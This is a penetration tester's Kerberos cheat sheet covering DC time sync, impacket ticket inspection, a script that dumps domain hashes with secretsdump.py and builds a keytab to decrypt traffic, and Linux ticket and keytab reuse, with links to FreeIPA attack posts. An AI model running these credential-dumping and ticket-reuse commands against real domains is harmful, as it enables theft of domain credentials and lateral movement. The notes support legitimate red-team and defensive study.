# Kerberos
*
*
*
*
*
*
*
*
*
*
*
{% embed url="" %}
{% embed url="" %}
## Synchronize Time
Using `ntpdate`:
```
$ sudo apt install ntpdate -y
$ sudo ntpdate $DC
```
Using `faketime`:
```
$ sudo apt install faketime -y
$ faketime '1970-01-01 00:00:00' /bin/date
$ faketime "`ntpdate -q $DC | awk -F. '{print $1}'`" /bin/date
```
Using LDAP:
```
$ LDAP_TIME=`ldapsearch -x -H ldap://DC01.megacorp.local -s base -b "" currentTime | awk '/currentTime/ {print $2}' | grep -v "requesting:" | sed -E 's/^([0-9]{4})([0-9]{2})([0-9]{2})([0-9]{2})([0-9]{2})([0-9]{2})\.0Z$/\1-\2-\3 \4:\5:\6 UTC/'`
$ LDAP_TIME=`date -d "$LDAP_TIME X hours" '+%Y-%m-%d %H:%M:%S'`
$ echo $LDAP_TIME && sudo date -u -s $LDAP_TIME
```
## Describe Tickets
*
Using [describeTicket.py](https://github.com/fortra/impacket/blob/master/examples/describeTicket.py):
```
$ describeTicket.py --rc4 21c1d44272e8ad1ee9e6b1aed2943688 --aes d38bf2b75fd1732a4cd7e5d129c62f0ed7feaccaff05c6b4a3bf6a9fc2004036 /tmp/snovvcrash.ccache
```
## Decrypt KRB5 Traffic
*
*
{% code title="keytab.sh" %}
```bash
REALM='MEGACORP.LOCAL'
secretsdump.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local -just-dc | tee secretsdump.out
# ---
cat secretsdump.out | grep aad3b435 | awk -F: '{print " (23, '\''"$4"'\''),"}' > keys
cat secretsdump.out | grep aes256-cts-hmac-sha1-96 | awk -F: '{print " (18, '\''"$3"'\''),"}' >> keys
curl -sSL https://github.com/dirkjanm/forest-trust-tools/raw/6bfeb990f0db8a580afe5cbba3cce1bf959a7fb8/keytab.py > keytab.py
awk 'NR <= 112' keytab.py > t
cat keys >> t
awk 'NR >= 118' keytab.py >> t
sed -i "s/TESTSEGMENT.LOCAL/${REALM}/g" t
mv t keytab.py
python3 keytab.py keytab.kt
```
{% endcode %}
## Kerberos on Linux
*
Check `KRB5CCNAME` environment variable contents:
```
$ env | grep KRB5
```
Request TGT supplying password:
```
$ kinit
$ klist
```
List available SPNs:
```
$ ldapsearch -Y GSSAPI -H ldap://dc1.megacorp.local -D "Administrator@MEGACORP.LOCAL" -W -b "dc=megacorp,dc=local" "servicePrincipalName=*" servicePrincipalName
```
Request TGS for MSSQL service:
```
$ kvno MSSQLSvc/SRV01.megacorp.local:1433
$ klist
```
Re-using keytab files to load and renew a TGT:
```
$ kinit administrator@MEGACORP.LOCAL -k -t /tmp/administrator.keytab
$ klist
$ kinit -R
```
Re-using ccache files:
```
$ sudo chown snovvcrash:snovvcrash /tmp/krb5cc_31337
$ kdestroy
$ export KRB5CCACHE=/tmp/krb5cc_31337
$ klist
```
### FreeIPA
*
*
A blog series by [@n0pe\_sled](https://medium.com/@n0pe_sled) on attacking FreeIPA:
* [Building a FreeIPA Lab](https://posts.specterops.io/building-a-freeipa-lab-17f3f52cd8d9)
* [Attacking FreeIPA — Part I Authentication](https://posts.specterops.io/attacking-freeipa-part-i-authentication-77e73d837d6a)
* [Attacking FreeIPA — Part II Enumeration](https://posts.specterops.io/attacking-freeipa-part-ii-enumeration-ad27224371e1)
* [Attacking FreeIPA — Part III: Finding A Path](https://posts.specterops.io/attacking-freeipa-part-iii-finding-a-path-677405b5b95e)
* [Attacking FreeIPA — Part IV: CVE-2020–10747](https://posts.specterops.io/attacking-freeipa-part-iv-cve-2020-10747-7c373a1bf66b)
*